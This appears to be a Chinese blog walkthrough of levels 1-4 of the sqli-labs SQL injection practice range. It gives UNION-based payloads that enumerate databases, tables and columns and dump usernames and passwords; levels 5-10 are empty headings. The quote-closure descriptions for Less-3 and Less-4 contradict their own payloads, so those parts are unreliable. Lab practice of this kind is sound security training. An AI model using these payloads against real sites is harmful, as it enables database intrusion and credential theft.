sql注入靶场1-10关

已于 2024-08-20 18:15:24 修改
阅读量170 收藏 3
点赞数 6
文章标签: sql 数据库
于 2024-08-06 09:20:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/psz7722/article/details/140944822
版权

Less-1

提示你输入数字值的ID作为参数,我们输入?id=1

接下来判断是字符型还是数字型

输入?id=1'     //报错

输入?id=1' --+     //(--+为注释符)正常回显

我们判断出是字符型

用order by语句来查看有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。一步一步测试

?id=1'order by 3 --+

将3换成4后就报错,说明数据有3列

?id=1'order by 4 --+

爆出显示位:

?id=-1'union select 1,2,3--+

然后获取当前数据名和版本号

?id=-1'union select 1,database(),version()--+

爆表

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询到账号密码在这个表中,现在要得到该字段内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

Less-2

思路和第一关一样,先判断为什么类型

输入?id=1‘ --+     //报错

输入?id=1 --+     //正常回显

说明是数字型注入

用order by语句来查看有几列

?id=1 order by 3--+

显示位:

?id=-1 union select 1,2,3--+

然后获取当前数据名和版本号

?id=-1 union select 1,database(),version()--+

爆表:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询到账号密码在这个表中,现在要得到该字段内容

?id=-1 union select 1,2,group_concat(username ,id , password) from users--+

Less-3

输入?id=1'出现回显如下,根据报错信息我们可以推断单引号字符型且有括号,所以需要闭合单引号且也要考虑括号

用order by语句来查看有几列:

?id=1") order by 3--+

显示位:

?id=-1") union select 1,2,3--+

然后获取当前数据名和版本号:

?id=-1") union select 1,database(),version()--+

爆表:

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

得到该字段内容:

?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

Less-4

输入?id=1根据页面报错信息得知sql语句是双引号字符型且有括号

用order by语句来查看有几列:

?id=1') order by 3--+

显示位:

?id=-1') union select 1,2,3--+

然后获取当前数据名和版本号:

?id=-1') union select 1,database(),version()--+

爆表:

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名:

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

得到该字段内容:

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

Less-5

Less-6

Less-7

Less-8

Less-9

Less-10

柒七柒77
关注
sql注入靶场(1-40
weixin_45955617的博客
05-30 716
2、开始打靶综合概述:1-4、11-14:显注(union)5-10、15-16:盲注17-22:报错注入23:过滤注释24:二次注入25-28a:过滤+双写绕过29-31:http参数污染32-37:宽字节注入38-40:堆叠注入。
sql注入靶场sqli-labs(1-4)
qq_64153534的博客
02-28 291
打开第一提示输入数字作为参数输入回显用户名与密码信息输入试探可以使用')")这几个常用闭合方式来判断,报错信息回显,根据信息判断注入点就是?id=1'我们输入的1'被两个单引号包裹着,可判断出语句是单引号闭合,注入点就是一个单引号我们使用判断表的字段数,从1开始到4的时候报错,可知字段数为3,后面使用联合注入要知道字段数,这里的作用是将后面的内容都注释掉,使后面的语句不影响我们插入的sql语句
SQL注入-SQLi-LABS靶场1-65完整payload
问彡心的博客
12-27 1272
【代码】SQL注入-SQLi-LABS靶场1-65完整payload。
sql注入靶场实操
m0_46104808的博客
10-27 1573
sql注入漏洞利用
sqlmap过SQLi-LABS靶场 1-10
小明师傅博客
06-04 8192
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7648
sqli-labs,sql注入,burpsuit
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...
sql注入靶场sqli-labs
08-31
sqli-labs是一个用于学习和测试SQL注入漏洞的靶场。它包含了一系列不同难度级别的挑战,每个挑战都涉及到SQL注入漏洞的利用。通过完成这些挑战,你可以更好地理解SQL注入漏洞的原理和利用方法。 你可以在GitHub上...
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 181
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 504
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
SQL题目解析:外卖平台数据分析
天冬忘忧的博客
09-10 1208
在本次SQL中,我们将通过一系列查询来分析外卖平台的数据,包括用户、餐厅和订单信息。这些查询将帮助我们理解用户行为、餐厅表现和订单趋势。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1689
创建表修改表删除表。
基于SSM和VUE的药品管理系统(含源码+sql+视频导入教程+文档)
coderbu的博客
09-12 758
基于SSM和VUE的药品管理系统2拥有两种角色 管理员:药品管理、出库管理、入库管理、销售员管理、报损管理等 销售员:登录注册、入库、出库、销售、报损等
SQL(结构性查询语句)
2301_78693337的博客
09-11 404
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2092
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
SQL server 日常运维命令
2301_76664379的博客
09-10 1734
【代码】SQL server 日常运维命令。
sqlserver常用的sql命令
2301_76664379的博客
09-11 656
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值